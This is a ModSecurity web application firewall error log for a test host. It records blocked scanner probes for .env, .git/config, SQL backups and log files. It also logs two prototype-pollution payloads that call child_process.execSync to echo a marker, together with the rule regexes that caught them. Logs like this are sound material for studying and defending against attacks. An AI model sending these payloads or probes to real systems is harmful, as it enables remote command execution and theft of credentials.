[Mon Jan 12 12:28:34.219374 2026] [:error] [pid 1355925] [client 13.40.27.204:46130] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWTa4k7thAymmecRvtl0OwAAAAI"]
[Mon Jan 12 13:02:52.441242 2026] [:error] [pid 1365300] [client 85.11.167.4:42360] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1768219372_5180',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWTi7NlKlmIJBGbQbR78ZQAAAAs"], referer: https://economiasolidale.test.indacotrentino.com
[Mon Jan 12 13:02:52.441371 2026] [:error] [pid 1365300] [client 85.11.167.4:42360] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1768219372_5180',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [ [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWTi7NlKlmIJBGbQbR78ZQAAAAs"], referer: https://economiasolidale.test.indacotrentino.com
[Mon Jan 12 13:02:52.441474 2026] [:error] [pid 1365300] [client 85.11.167.4:42360] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo vuln_1768219372_5180 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWTi7NlKlmIJBGbQbR78ZQAAAAs"], referer: https://economiasolidale.test.indacotrentino.com
[Mon Jan 12 13:02:52.442633 2026] [:error] [pid 1365300] [client 85.11.167.4:42360] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWTi7NlKlmIJBGbQbR78ZQAAAAs"], referer: https://economiasolidale.test.indacotrentino.com
[Mon Jan 12 13:02:52.442804 2026] [:error] [pid 1365300] [client 85.11.167.4:42360] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWTi7NlKlmIJBGbQbR78ZQAAAAs"], referer: https://economiasolidale.test.indacotrentino.com
[Mon Jan 12 13:02:52.585494 2026] [:error] [pid 1358564] [client 85.11.167.4:42362] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1768219372',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "app [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWTi7B_UgGRJ4jDk47tQegAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Mon Jan 12 13:02:52.585623 2026] [:error] [pid 1358564] [client 85.11.167.4:42362] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1768219372',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag " [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWTi7B_UgGRJ4jDk47tQegAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Mon Jan 12 13:02:52.585694 2026] [:error] [pid 1358564] [client 85.11.167.4:42362] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo test_1768219372 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWTi7B_UgGRJ4jDk47tQegAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Mon Jan 12 13:02:52.586780 2026] [:error] [pid 1358564] [client 85.11.167.4:42362] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWTi7B_UgGRJ4jDk47tQegAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Mon Jan 12 13:02:52.586945 2026] [:error] [pid 1358564] [client 85.11.167.4:42362] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWTi7B_UgGRJ4jDk47tQegAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Mon Jan 12 15:42:51.081068 2026] [:error] [pid 1355924] [client 18.183.223.70:36442] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWUIa9IpinFXoPzDav5wjgAAAAE"]
[Mon Jan 12 15:42:51.081327 2026] [:error] [pid 1355924] [client 18.183.223.70:36442] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWUIa9IpinFXoPzDav5wjgAAAAE"]
[Mon Jan 12 15:42:51.081504 2026] [:error] [pid 1355924] [client 18.183.223.70:36442] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWUIa9IpinFXoPzDav5wjgAAAAE"]
[Mon Jan 12 15:42:51.804689 2026] [:error] [pid 1355926] [client 18.183.223.70:36618] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWUIa8C2y5bYy1r2HoPzdQAAAAM"]
[Mon Jan 12 15:42:51.804898 2026] [:error] [pid 1355926] [client 18.183.223.70:36618] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWUIa8C2y5bYy1r2HoPzdQAAAAM"]
[Mon Jan 12 15:42:51.805056 2026] [:error] [pid 1355926] [client 18.183.223.70:36618] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWUIa8C2y5bYy1r2HoPzdQAAAAM"]
[Mon Jan 12 15:42:53.257655 2026] [:error] [pid 1365300] [client 18.183.223.70:36938] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aWUIbdlKlmIJBGbQbR78gQAAAAs"]
[Mon Jan 12 15:42:53.257994 2026] [:error] [pid 1365300] [client 18.183.223.70:36938] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aWUIbdlKlmIJBGbQbR78gQAAAAs"]
[Mon Jan 12 15:42:53.258165 2026] [:error] [pid 1365300] [client 18.183.223.70:36938] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aWUIbdlKlmIJBGbQbR78gQAAAAs"]
[Mon Jan 12 15:42:53.991057 2026] [:error] [pid 1362231] [client 18.183.223.70:37108] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aWUIbcuCkgRo958sQERiQgAAAAc"]
[Mon Jan 12 15:42:53.991378 2026] [:error] [pid 1362231] [client 18.183.223.70:37108] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aWUIbcuCkgRo958sQERiQgAAAAc"]
[Mon Jan 12 15:42:53.991545 2026] [:error] [pid 1362231] [client 18.183.223.70:37108] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aWUIbcuCkgRo958sQERiQgAAAAc"]
[Mon Jan 12 15:42:54.717719 2026] [:error] [pid 1355923] [client 18.183.223.70:37260] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aWUIbiE1xEBhFyXickXrrwAAAAA"]
[Mon Jan 12 15:42:54.718068 2026] [:error] [pid 1355923] [client 18.183.223.70:37260] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aWUIbiE1xEBhFyXickXrrwAAAAA"]
[Mon Jan 12 15:42:54.718243 2026] [:error] [pid 1355923] [client 18.183.223.70:37260] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aWUIbiE1xEBhFyXickXrrwAAAAA"]
[Mon Jan 12 15:42:55.452118 2026] [:error] [pid 1362233] [client 18.183.223.70:37394] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWUIb32DuVtAKraH1YOOAwAAAAk"]
[Mon Jan 12 15:42:55.452500 2026] [:error] [pid 1362233] [client 18.183.223.70:37394] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWUIb32DuVtAKraH1YOOAwAAAAk"]
[Mon Jan 12 15:42:55.453083 2026] [:error] [pid 1362233] [client 18.183.223.70:37394] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWUIb32DuVtAKraH1YOOAwAAAAk"]
